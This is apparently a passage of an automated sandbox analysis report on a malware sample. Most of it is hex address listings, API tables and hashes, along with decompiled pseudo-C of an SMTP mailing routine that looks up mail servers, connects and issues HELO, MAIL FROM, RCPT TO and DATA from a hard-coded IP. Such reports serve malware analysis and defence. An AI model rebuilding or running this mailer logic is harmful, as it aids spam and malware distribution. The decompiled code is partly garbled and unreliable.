                                                                                                                                                                                                                                                                                    0x00ea1c37
                                                                                                                                                                                                                                                                                    0x00ea1c3d
                                                                                                                                                                                                                                                                                    0x00ea1c40
                                                                                                                                                                                                                                                                                    0x00ea1c46
                                                                                                                                                                                                                                                                                    0x00ea1c4d
                                                                                                                                                                                                                                                                                    0x00ea1c58
                                                                                                                                                                                                                                                                                    0x00ea1c62
                                                                                                                                                                                                                                                                                    0x00ea1c70
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c7c
                                                                                                                                                                                                                                                                                    0x00ea1c83
                                                                                                                                                                                                                                                                                    0x00ea1c87
                                                                                                                                                                                                                                                                                    0x00ea1c91
                                                                                                                                                                                                                                                                                    0x00ea1c9f
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cc9
                                                                                                                                                                                                                                                                                    0x00ea1ccf
                                                                                                                                                                                                                                                                                    0x00ea1cdd
                                                                                                                                                                                                                                                                                    0x00ea1cea
                                                                                                                                                                                                                                                                                    0x00ea1cf2
                                                                                                                                                                                                                                                                                    0x00ea1cfb
                                                                                                                                                                                                                                                                                    0x00ea1d0a
                                                                                                                                                                                                                                                                                    0x00ea1d11
                                                                                                                                                                                                                                                                                    0x00ea1d16
                                                                                                                                                                                                                                                                                    0x00ea1d17
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d22
                                                                                                                                                                                                                                                                                    0x00ea1d27
                                                                                                                                                                                                                                                                                    0x00ea1d28
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d33
                                                                                                                                                                                                                                                                                    0x00ea1d38
                                                                                                                                                                                                                                                                                    0x00ea1d39
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d44
                                                                                                                                                                                                                                                                                    0x00ea1d49
                                                                                                                                                                                                                                                                                    0x00ea1d4a
                                                                                                                                                                                                                                                                                    0x00ea1d4f
                                                                                                                                                                                                                                                                                    0x00ea1d6c
                                                                                                                                                                                                                                                                                    0x00ea1d73
                                                                                                                                                                                                                                                                                    0x00ea1d79
                                                                                                                                                                                                                                                                                    0x00ea1d7c
                                                                                                                                                                                                                                                                                    0x00ea1d82
                                                                                                                                                                                                                                                                                    0x00ea1d90
                                                                                                                                                                                                                                                                                    0x00ea1d94
                                                                                                                                                                                                                                                                                    0x00ea1d9e
                                                                                                                                                                                                                                                                                    0x00ea1dac
                                                                                                                                                                                                                                                                                    0x00ea1dc5
                                                                                                                                                                                                                                                                                    0x00ea1dce
                                                                                                                                                                                                                                                                                    0x00ea1ddc
                                                                                                                                                                                                                                                                                    0x00ea1de3
                                                                                                                                                                                                                                                                                    0x00ea1de9
                                                                                                                                                                                                                                                                                    0x00ea1dec
                                                                                                                                                                                                                                                                                    0x00ea1df9
                                                                                                                                                                                                                                                                                    0x00ea1e00
                                                                                                                                                                                                                                                                                    0x00ea1e04
                                                                                                                                                                                                                                                                                    0x00ea1e0e
                                                                                                                                                                                                                                                                                    0x00ea1e25
                                                                                                                                                                                                                                                                                    0x00ea1e2c
                                                                                                                                                                                                                                                                                    0x00ea1e32
                                                                                                                                                                                                                                                                                    0x00ea1e35
                                                                                                                                                                                                                                                                                    0x00ea1e3b
                                                                                                                                                                                                                                                                                    0x00ea1e49
                                                                                                                                                                                                                                                                                    0x00ea1e4d
                                                                                                                                                                                                                                                                                    0x00ea1e57
                                                                                                                                                                                                                                                                                    0x00ea1e65
                                                                                                                                                                                                                                                                                    0x00ea1e75
                                                                                                                                                                                                                                                                                    0x00ea1e7b
                                                                                                                                                                                                                                                                                    0x00ea1e7e
                                                                                                                                                                                                                                                                                    0x00ea1e84
                                                                                                                                                                                                                                                                                    0x00ea1e8b
                                                                                                                                                                                                                                                                                    0x00ea1ea0
                                                                                                                                                                                                                                                                                    0x00ea1eb8
                                                                                                                                                                                                                                                                                    0x00ea1ebf
                                                                                                                                                                                                                                                                                    0x00ea1ec5
                                                                                                                                                                                                                                                                                    0x00ea1ec8
                                                                                                                                                                                                                                                                                    0x00ea1ece
                                                                                                                                                                                                                                                                                    0x00ea1edc
                                                                                                                                                                                                                                                                                    0x00ea1ee0
                                                                                                                                                                                                                                                                                    0x00ea1eea
                                                                                                                                                                                                                                                                                    0x00ea1ef8
                                                                                                                                                                                                                                                                                    0x00ea1f0b
                                                                                                                                                                                                                                                                                    0x00ea1f11
                                                                                                                                                                                                                                                                                    0x00ea1f14
                                                                                                                                                                                                                                                                                    0x00ea1f1a
                                                                                                                                                                                                                                                                                    0x00ea1f21
                                                                                                                                                                                                                                                                                    0x00ea1f2c
                                                                                                                                                                                                                                                                                    0x00ea1f36
                                                                                                                                                                                                                                                                                    0x00ea1f44
                                                                                                                                                                                                                                                                                    0x00ea1f4b
                                                                                                                                                                                                                                                                                    0x00ea1f66
                                                                                                                                                                                                                                                                                    0x00ea1f74
                                                                                                                                                                                                                                                                                    0x00ea1f7b
                                                                                                                                                                                                                                                                                    0x00ea1f81
                                                                                                                                                                                                                                                                                    0x00ea1f84
                                                                                                                                                                                                                                                                                    0x00ea1f8a
                                                                                                                                                                                                                                                                                    0x00ea1f98
                                                                                                                                                                                                                                                                                    0x00ea1f9c
                                                                                                                                                                                                                                                                                    0x00ea1fa6
                                                                                                                                                                                                                                                                                    0x00ea1fbb
                                                                                                                                                                                                                                                                                    0x00ea1fc9
                                                                                                                                                                                                                                                                                    0x00ea1fe2
                                                                                                                                                                                                                                                                                    0x00ea1fec
                                                                                                                                                                                                                                                                                    0x00ea2008
                                                                                                                                                                                                                                                                                    0x00ea2015
                                                                                                                                                                                                                                                                                    0x00ea2030
                                                                                                                                                                                                                                                                                    0x00ea2044
                                                                                                                                                                                                                                                                                    0x00ea2051
                                                                                                                                                                                                                                                                                    0x00ea2080
                                                                                                                                                                                                                                                                                    0x00ea208d
                                                                                                                                                                                                                                                                                    0x00ea20bc
                                                                                                                                                                                                                                                                                    0x00ea20c9
                                                                                                                                                                                                                                                                                    0x00ea20e1
                                                                                                                                                                                                                                                                                    0x00ea20e5
                                                                                                                                                                                                                                                                                    0x00ea20ef
                                                                                                                                                                                                                                                                                    0x00ea2104
                                                                                                                                                                                                                                                                                    0x00ea211f
                                                                                                                                                                                                                                                                                    0x00ea2133
                                                                                                                                                                                                                                                                                    0x00ea2140
                                                                                                                                                                                                                                                                                    0x00ea216f
                                                                                                                                                                                                                                                                                    0x00ea217c
                                                                                                                                                                                                                                                                                    0x00ea21ab
                                                                                                                                                                                                                                                                                    0x00ea21b8
                                                                                                                                                                                                                                                                                    0x00ea21d0
                                                                                                                                                                                                                                                                                    0x00ea21de
                                                                                                                                                                                                                                                                                    0x00ea21e9
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea21f2
                                                                                                                                                                                                                                                                                    0x00ea21f9
                                                                                                                                                                                                                                                                                    0x00ea21fd
                                                                                                                                                                                                                                                                                    0x00ea2205
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea2211
                                                                                                                                                                                                                                                                                    0x00ea221a
                                                                                                                                                                                                                                                                                    0x00ea2223
                                                                                                                                                                                                                                                                                    0x00ea222d
                                                                                                                                                                                                                                                                                    0x00ea2239
                                                                                                                                                                                                                                                                                    0x00ea2239

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA1BC6
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EA1BE2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: lstrlenA.KERNEL32(?), ref: 00EA112D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: send.WS2_32(?,?,000000FF,00000000), ref: 00EA1144
                                                                                                                                                                                                                                                                                    • shutdown.WS2_32(000000FF,00000002), ref: 00EA2223
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 00EA222D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: wsprintf$closesocketlstrlensendshutdown
                                                                                                                                                                                                                                                                                    • String ID: <%s>$MAIL FROM: %s
                                                                                                                                                                                                                                                                                    • API String ID: 1146405-791590210
                                                                                                                                                                                                                                                                                    • Opcode ID: 6c29da4d9a09a75734d7eaf6c7db3c36c01a961ce452d790e3a560a57cb0d651
                                                                                                                                                                                                                                                                                    • Instruction ID: a645a7f32d1b0510a5e04066b88d511afa4332a546ac6c66fafa1088e010f5c2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c29da4d9a09a75734d7eaf6c7db3c36c01a961ce452d790e3a560a57cb0d651
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42212EF5D002189FCF10CB94DC45BEEB778BB9D308F0051A9E609BB191E7746998CB65
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 234 ea1760-ea178a DnsQuery_A 235 ea17bf-ea17ca DnsFree 234->235 236 ea178c-ea17a4 call ea16e0 234->236 238 ea17cc-ea17cf 235->238 236->235 240 ea17a6-ea17bd DnsFree closesocket 236->240 240->238
                                                                                                                                                                                                                                                                                    C-Code - Quality: 31%
                                                                                                                                                                                                                                                                                    			E00EA1760() {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				char* _t12;
                                                                                                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				_t12 =  &_v8;
                                                                                                                                                                                                                                                                                    				_push(_t12);
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				_push(0xf);
                                                                                                                                                                                                                                                                                    				_push("yahoo.com"); // executed
                                                                                                                                                                                                                                                                                    				L00EA307A(); // executed
                                                                                                                                                                                                                                                                                    				_v12 = _t12;
                                                                                                                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                                                                                                    					L00EA3074();
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t14 = E00EA16E0( *((intOrPtr*)(_v8 + 0x18)), 0x19); // executed
                                                                                                                                                                                                                                                                                    				_v16 = _t14;
                                                                                                                                                                                                                                                                                    				if(_v16 <= 0) {
                                                                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L00EA3074();
                                                                                                                                                                                                                                                                                    				__imp__#3(_v16, _v8, 1); // executed
                                                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x00ea1766
                                                                                                                                                                                                                                                                                    0x00ea176d
                                                                                                                                                                                                                                                                                    0x00ea176f
                                                                                                                                                                                                                                                                                    0x00ea1772
                                                                                                                                                                                                                                                                                    0x00ea1773
                                                                                                                                                                                                                                                                                    0x00ea1775
                                                                                                                                                                                                                                                                                    0x00ea1777
                                                                                                                                                                                                                                                                                    0x00ea1779
                                                                                                                                                                                                                                                                                    0x00ea177e
                                                                                                                                                                                                                                                                                    0x00ea1783
                                                                                                                                                                                                                                                                                    0x00ea178a
                                                                                                                                                                                                                                                                                    0x00ea17bf
                                                                                                                                                                                                                                                                                    0x00ea17bf
                                                                                                                                                                                                                                                                                    0x00ea17c4
                                                                                                                                                                                                                                                                                    0x00ea17c5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea17ca
                                                                                                                                                                                                                                                                                    0x00ea1795
                                                                                                                                                                                                                                                                                    0x00ea179d
                                                                                                                                                                                                                                                                                    0x00ea17a4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea17ac
                                                                                                                                                                                                                                                                                    0x00ea17b5
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DnsQuery_A.DNSAPI(yahoo.com,0000000F,00000000,00000000,00000000,00000000), ref: 00EA177E
                                                                                                                                                                                                                                                                                    • DnsFree.DNSAPI(00000000,00000001), ref: 00EA17AC
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(00000000), ref: 00EA17B5
                                                                                                                                                                                                                                                                                    • DnsFree.DNSAPI(00000000,00000001), ref: 00EA17C5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Free$Query_closesocket
                                                                                                                                                                                                                                                                                    • String ID: yahoo.com
                                                                                                                                                                                                                                                                                    • API String ID: 1946217314-667638125
                                                                                                                                                                                                                                                                                    • Opcode ID: 3f090dcd194f212610e15479bf9e250604685d034834d98d428b28e588249bcf
                                                                                                                                                                                                                                                                                    • Instruction ID: 9ab2297993142ee8c6ef45f13600b5f993800356762653d90c153f77752fc326
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f090dcd194f212610e15479bf9e250604685d034834d98d428b28e588249bcf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC016D74E40208FBDB10EBE0C886B9DB7B89B4AB04F206195F600BF2C1D6B5BB459B50
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 241 ea19e0-ea1a05 call ea2260 244 ea1a0b-ea1a26 call ea10a0 241->244 245 ea2233-ea2239 241->245 244->245 248 ea1a2c-ea1a3f socket 244->248 248->245 249 ea1a45-ea1a49 248->249 249->245 250 ea1a4f-ea1a62 connect 249->250 251 ea1a68-ea1a89 setsockopt 250->251 252 ea221d-ea222d shutdown closesocket 250->252 253 ea1a90-ea1a94 251->253 252->245 254 ea1a9a-ea1a9e 253->254 255 ea2211-ea221a 253->255 254->255 256 ea1aa4-ea1ab4 call ea1160 254->256 255->252 258 ea1ab9-ea1ac9 256->258 259 ea1acb 258->259 260 ea1ad0-ea1aef call ea11c0 258->260 259->255 263 ea1af1 260->263 264 ea1af6-ea1b15 260->264 263->255 265 ea1b1b 264->265 266 ea220c 264->266 265->266 266->253
                                                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                    			E00EA19E0(int _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				char* _v32;
                                                                                                                                                                                                                                                                                    				int _v36;
                                                                                                                                                                                                                                                                                    				char _v140;
                                                                                                                                                                                                                                                                                    				char _v144;
                                                                                                                                                                                                                                                                                    				intOrPtr _v148;
                                                                                                                                                                                                                                                                                    				char _v1172;
                                                                                                                                                                                                                                                                                    				int _v1176;
                                                                                                                                                                                                                                                                                    				int _v1180;
                                                                                                                                                                                                                                                                                    				int _v1184;
                                                                                                                                                                                                                                                                                    				char _v1292;
                                                                                                                                                                                                                                                                                    				char _v1556;
                                                                                                                                                                                                                                                                                    				char _v1568;
                                                                                                                                                                                                                                                                                    				char _v1580;
                                                                                                                                                                                                                                                                                    				char _v1684;
                                                                                                                                                                                                                                                                                    				char _v1696;
                                                                                                                                                                                                                                                                                    				char _v1708;
                                                                                                                                                                                                                                                                                    				char _v1812;
                                                                                                                                                                                                                                                                                    				int _v1816;
                                                                                                                                                                                                                                                                                    				signed int _v1820;
                                                                                                                                                                                                                                                                                    				intOrPtr _t183;
                                                                                                                                                                                                                                                                                    				char* _t186;
                                                                                                                                                                                                                                                                                    				intOrPtr _t190;
                                                                                                                                                                                                                                                                                    				void* _t191;
                                                                                                                                                                                                                                                                                    				void* _t218;
                                                                                                                                                                                                                                                                                    				void* _t219;
                                                                                                                                                                                                                                                                                    				void* _t220;
                                                                                                                                                                                                                                                                                    				void* _t221;
                                                                                                                                                                                                                                                                                    				void* _t222;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_t183 = E00EA2260(_a4, 0x40);
                                                                                                                                                                                                                                                                                    				_t220 = _t219 + 8;
                                                                                                                                                                                                                                                                                    				_v8 = _t183;
                                                                                                                                                                                                                                                                                    				if(_v8 == 0) {
                                                                                                                                                                                                                                                                                    					L57:
                                                                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                    				_t186 = E00EA10A0(_v8,  &_v28); // executed
                                                                                                                                                                                                                                                                                    				_t221 = _t220 + 8;
                                                                                                                                                                                                                                                                                    				if(_t186 == 0) {
                                                                                                                                                                                                                                                                                    					goto L57;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				__imp__#23(2, 1, 6); // executed
                                                                                                                                                                                                                                                                                    				_v32 = _t186;
                                                                                                                                                                                                                                                                                    				if(_v32 == 0xffffffff || _v32 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					goto L57;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					__imp__#4(_v32,  &_v28, 0x10); // executed
                                                                                                                                                                                                                                                                                    					if(_t186 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						L56:
                                                                                                                                                                                                                                                                                    						__imp__#22(_v32, 2); // executed
                                                                                                                                                                                                                                                                                    						__imp__#3(_v32);
                                                                                                                                                                                                                                                                                    						goto L57;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_v144 = 1;
                                                                                                                                                                                                                                                                                    						__imp__#21(_v32, 6, 1,  &_v144, 4); // executed
                                                                                                                                                                                                                                                                                    						_v36 = 1;
                                                                                                                                                                                                                                                                                    						while(_v36 != 0 && _v36 != 8) {
                                                                                                                                                                                                                                                                                    							_t190 = E00EA1160(_v32,  &_v1172, 0x400); // executed
                                                                                                                                                                                                                                                                                    							_t222 = _t221 + 0xc;
                                                                                                                                                                                                                                                                                    							_v148 = _t190;
                                                                                                                                                                                                                                                                                    							if(_v148 != 0) {
                                                                                                                                                                                                                                                                                    								 *((char*)(_t218 + _v148 - 0x490)) = 0;
                                                                                                                                                                                                                                                                                    								_t191 = E00EA11C0( &_v1172);
                                                                                                                                                                                                                                                                                    								_t221 = _t222 + 4;
                                                                                                                                                                                                                                                                                    								if(_t191 != 0) {
                                                                                                                                                                                                                                                                                    									_v1820 = _v36;
                                                                                                                                                                                                                                                                                    									_v1820 = _v1820 - 1;
                                                                                                                                                                                                                                                                                    									if(_v1820 > 6) {
                                                                                                                                                                                                                                                                                    										L54:
                                                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									switch( *((intOrPtr*)(_v1820 * 4 +  &M00EA223C))) {
                                                                                                                                                                                                                                                                                    										case 0:
                                                                                                                                                                                                                                                                                    											_push("ESMTP");
                                                                                                                                                                                                                                                                                    											if(StrStrA( &_v1172) == 0) {
                                                                                                                                                                                                                                                                                    												_t195 = wsprintfA( &_v1172, "HELO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    												_t223 = _t221 + 0xc;
                                                                                                                                                                                                                                                                                    												_v1176 = _t195;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_t198 = wsprintfA( &_v1172, "EHLO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    												_t223 = _t221 + 0xc;
                                                                                                                                                                                                                                                                                    												_v1176 = _t198;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											_t197 = E00EA1120(_v32,  &_v1172, _v1176); // executed
                                                                                                                                                                                                                                                                                    											_t221 = _t223 + 0xc;
                                                                                                                                                                                                                                                                                    											if(_t197 != 0) {
                                                                                                                                                                                                                                                                                    												_v36 = 3;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_v36 = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L54;
                                                                                                                                                                                                                                                                                    										case 1:
                                                                                                                                                                                                                                                                                    											goto L54;
                                                                                                                                                                                                                                                                                    										case 2:
                                                                                                                                                                                                                                                                                    											__eax = _a4;
                                                                                                                                                                                                                                                                                    											__ecx =  &_v140;
                                                                                                                                                                                                                                                                                    											__eax = wsprintfA( &_v140, "<%s>", _a4);
                                                                                                                                                                                                                                                                                    											__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    											__eax =  &_v1172;
                                                                                                                                                                                                                                                                                    											__eax = wsprintfA( &_v1172, "MAIL FROM: %s\r\n",  &_v140);
                                                                                                                                                                                                                                                                                    											__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    											_v1180 = __eax;
                                                                                                                                                                                                                                                                                    											__ecx = _v1180;
                                                                                                                                                                                                                                                                                    											__eax = _v32;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1120(_v32,  &_v1172, _v1180); // executed
                                                                                                                                                                                                                                                                                    											if(__eax != 0) {
                                                                                                                                                                                                                                                                                    												_v36 = 4;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_v36 = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L54;
                                                                                                                                                                                                                                                                                    										case 3:
                                                                                                                                                                                                                                                                                    											__ecx = _a4;
                                                                                                                                                                                                                                                                                    											__eax = wsprintfA( &_v1172, "RCPT TO: <%s>\r\n", _a4);
                                                                                                                                                                                                                                                                                    											__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    											_v1184 = __eax;
                                                                                                                                                                                                                                                                                    											__eax = _v1184;
                                                                                                                                                                                                                                                                                    											__ecx =  &_v1172;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1120(_v32,  &_v1172, _v1184); // executed
                                                                                                                                                                                                                                                                                    											if(__eax != 0) {
                                                                                                                                                                                                                                                                                    												_v36 = 5;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_v36 = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L54;
                                                                                                                                                                                                                                                                                    										case 4:
                                                                                                                                                                                                                                                                                    											__eax = _v32;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1120(_v32, "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    											if(__eax != 0) {
                                                                                                                                                                                                                                                                                    												_v36 = 6;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_v36 = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L54;
                                                                                                                                                                                                                                                                                    										case 5:
                                                                                                                                                                                                                                                                                    											__ecx =  &_v1568;
                                                                                                                                                                                                                                                                                    											E00EA1320( &_v1568, 5,  &_v1568) = wsprintfA( &_v1292, "%s.com", __eax);
                                                                                                                                                                                                                                                                                    											__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    											 &_v1812 = E00EA1490(0,  &_v1812, 1); // executed
                                                                                                                                                                                                                                                                                    											Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                                    											__ecx =  &_v1684;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1490(0,  &_v1684, 0); // executed
                                                                                                                                                                                                                                                                                    											__eax =  &_v1292;
                                                                                                                                                                                                                                                                                    											__eax = rand();
                                                                                                                                                                                                                                                                                    											asm("cdq");
                                                                                                                                                                                                                                                                                    											__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    											_t74 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    											__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    											__eax = rand();
                                                                                                                                                                                                                                                                                    											asm("cdq");
                                                                                                                                                                                                                                                                                    											__ecx = 0xfe;
